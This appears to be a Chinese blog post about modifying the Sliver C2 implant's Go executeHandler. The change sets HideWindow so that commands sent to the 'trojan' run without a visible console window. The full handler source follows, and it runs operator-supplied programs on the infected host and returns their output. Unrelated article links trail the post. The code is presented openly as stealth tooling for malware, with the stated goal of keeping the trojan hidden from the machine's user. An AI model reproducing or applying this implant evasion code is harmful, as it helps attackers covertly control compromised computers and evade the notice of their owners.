向木马发出指令后, 如果是cmd命令会有一个黑窗口一闪而灭, 不利于木马隐藏, 需要将executeHandlerhandlers.go拷贝到handlers_windows.go里,核心代码为 cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}表示隐藏命令弹窗

func executeHandler(data []byte, resp RPCResponse) {

	var (

		err       error

		stdErr    io.Writer

		stdOut    io.Writer

		errWriter *bufio.Writer

		outWriter *bufio.Writer

	)

	execReq := &sliverpb.ExecuteReq{}

	err = proto.Unmarshal(data, execReq)

	if err != nil {

		// {{if .Config.Debug}}

		log.Printf("error decoding message: %v", err)

		// {{end}}

		return

	}

	execResp := &sliverpb.Execute{}

	exePath, err := expandPath(execReq.Path)

	if err != nil {

		execResp.Response = &commonpb.Response{

			Err: fmt.Sprintf("%s", err),

		}

		proto.Marshal(execResp)

		resp(data, err)

		return

	}

	cmd := exec.Command(exePath, execReq.Args...)

	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}

	if execReq.Output {

		stdOutBuff := new(bytes.Buffer)

		stdErrBuff := new(bytes.Buffer)

		stdErr = stdErrBuff

		stdOut = stdOutBuff

		if execReq.Stderr != "" {

			stdErrFile, err := os.Create(execReq.Stderr)

			if err != nil {

				execResp.Response = &commonpb.Response{

					Err: fmt.Sprintf("%s", err),

				}

				proto.Marshal(execResp)

				resp(data, err)

				return

			}

			defer stdErrFile.Close()

			errWriter = bufio.NewWriter(stdErrFile)

			stdErr = io.MultiWriter(errWriter, stdErrBuff)

		}

		if execReq.Stdout != "" {

			stdOutFile, err := os.Create(execReq.Stdout)

			if err != nil {

				execResp.Response = &commonpb.Response{

					Err: fmt.Sprintf("%s", err),

				}

				proto.Marshal(execResp)

				resp(data, err)

				return

			}

			defer stdOutFile.Close()

			outWriter = bufio.NewWriter(stdOutFile)

			stdOut = io.MultiWriter(outWriter, stdOutBuff)

		}

		cmd.Stdout = stdOut

		cmd.Stderr = stdErr

		err := cmd.Run()

		//{{if .Config.Debug}}

		log.Printf("Exec (%v): %s", err, string(stdOutBuff.String()))

		//{{end}}

		if err != nil {

			// Exit errors are not a failure of the RPC, but of the command.

			if exiterr, ok := err.(*exec.ExitError); ok {

				execResp.Status = uint32(exiterr.ExitCode())

			} else {

				execResp.Response = &commonpb.Response{

					Err: fmt.Sprintf("%s", err),

				}

			}

		}

		if errWriter != nil {

			errWriter.Flush()

		}

		if outWriter != nil {

			outWriter.Flush()

		}

		execResp.Stderr = stdErrBuff.Bytes()

		execResp.Stdout = stdOutBuff.Bytes()

		if cmd.Process != nil {

			execResp.Pid = uint32(cmd.Process.Pid)

		}

	} else {

		err = cmd.Start()

		if err != nil {

			execResp.Response = &commonpb.Response{

				Err: fmt.Sprintf("%s", err),

			}

		}

		go func() {

			cmd.Wait()

		}()

		if cmd.Process != nil {

			execResp.Pid = uint32(cmd.Process.Pid)

		}

	}

	data, err = proto.Marshal(execResp)

	resp(data, err)

}

c2工具sliver 执行木马命令后会弹窗一闪而过的更多相关文章

  1. 使用 FileZilla FTP Client连接Vsftpd在执行LIST命令后提示连接超时

    使用 FileZilla FTP Client 连接 Vsftpd在执行LIST命令后提示连接超时. vi /etc/vsftpd/vsftpd.conf 添加: #开启被动模式 pasv_enabl ...

  2. 菜鸟调错(七)——控制台中执行mvn命令后提示‘cmd’不是内部或外部命令

    最近在cmd下使用mvn命令时,在执行完以后总会出现一句“‘cmd’不是内部或外部命令,也不是可执行程序或批处理文件”,如下图: 虽然命令执行成功了,不会有什么影响,但是身为强迫症晚期的我是绝对不能忍 ...

  3. linux执行python命令后permission denied

    linux下执行python后显示被拒绝问题定位: 1.检查下要执行的文件的权限是否存在执行权限,否则执行chmod命令赋予权限: 2.若赋予权限后仍然显示没有权限,检查下执行的python文件是否有 ...

  4. crt执行cat命令后乱码

    cat查看二进制文件后所有命令都乱码执行reset即可恢复

  5. 执行xcopy命令后出现Invalid num of parameters错误的解决办法

    作者:朱金灿 来源:http://blog.csdn.net/clever101 在执行一条批处理命令: xcopy /s /i /y C:\ppt D:\Program doc 开始很纳闷,上网一查 ...

  6. linux执行python命令后没有反应,不打印日志信息

    实际的python执行的软连接是路径是/opt/python2.7/bin/python,而设置的软连接错误如下: 修改该连接,是python指向/opt/python2.7/bin/python, ...

  7. [BAT] 执行xcopy命令后出现Invalid num of parameters错误的解决办法

    如果是Windows下的命令行,对于有空格的文件路径要加引号,对于xcopy命令就是源路径和目标路径都要加引号 xcopy "C:\ppt" "D:\Program do ...

  8. spark on yarn,client模式时,执行spark-submit命令后命令行日志和YARN AM日志

    [root@linux-node1 bin]# ./spark-submit \> --class com.kou.List2Hive \> --master yarn \> --d ...

  9. spark on yarn,cluster模式时,执行spark-submit命令后命令行日志和YARN AM日志

    [root@linux-node1 bin]# ./spark-submit \> --class com.kou.List2Hive \> --master yarn \> --d ...

  10. react+ant design 项目执行yarn run eject 命令后无法启动项目

    如何将内建配置全部暴露? 使用create-react-app结合antd搭建的项目中,项目目录没有该项目所有的内建配置, 1.执行yarn run eject 执行该命令后,运行项目yarn sta ...

随机推荐

  1. [转帖]如何在KingbaseES数据库查看数据库和表的大小

    关键字 kingbaseES,数据库大小,表大小 1.查看单个数据库的大小 使用ksql连接到数据库,使用sys_database_size函数 kapp=# select sys_database_ ...

  2. NOI2023 游记

    不完全按时间顺序写.记录 NOI 的一些琐事. 从 XDFZ 坐大巴 5 个小时来到成七.第一眼看到的是一个放着 NOI 牌子的台阶,还有一个签名墙.好像在我们之前到的人不太多? 用中英双语签名(冷月 ...

  3. 取消ts校验的注释

    常用的有以下注释 单行忽略 // @ts-ignore 忽略全文:如果你使用这样,需要放在ts的最顶部哈. // @ts-nocheck 如下 <script lang="ts&quo ...

  4. uni-app 顶部配置搜索框和左右图标

    顶部的图标只支持本地图片哈,所以你要将阿里巴巴上的图标下载到本地, 然后只要XXX.ttf这个文件就行了 然后放在static这个文件中 在pages.json中fontSrc进行引入. text:使 ...

  5. windowsbat命令大全

    Bat文件的创建及其命令大全 一.bat文件的创建 新建txt文本文件 向文本文件中输入命令 保存并修改文本文件后缀为.bat 双击保存后的bat文件,运行 二.bat命令大全 echo 和 @ @ ...

  6. 从零开始配置 vim(14)——目录管理插件

    我们在介绍vim目录管理的时候提到 vim自带一个 叫做 netrw的工具来管理目录.但是它自身的功能有限,而且样式也丑.今天我们将使用其他强大的插件来替代 netrw,增强目录管理功能 nvim-t ...

  7. 第二届数字化经济与管理科学国际学术会议(CDEMS 2024)

    [经济&管理|录用率高]第二届数字化经济与管理科学国际学术会议(CDEMS 2024) 2024 2nd International Conference on Digital Economy ...

  8. HTTP请求头引发的注入问题 (SQL注入)

    关于请求头中注入问题的演示,这里我写了一些测试案例,用来测试请求头中存在的问题.我们常见的会发生注入的点有 Referer.X-Forwarded-For.Cookie.X-Real-IP.Accep ...

  9. 多路io复用pool [补档-2023-07-19]

    多路IO- poll 3.1简介 ​ poll的机制与select类似,他们都是让内核在以线性的方法对文件描述符集合进行检测,根据描述符的状态进行具体的操作.并且poll和select在检测描述符集合 ...

  10. 守护进程(Python)

    #__author__:Kelvin #date:2020/5/10 11:37 import time from multiprocessing import Process def son1(): ...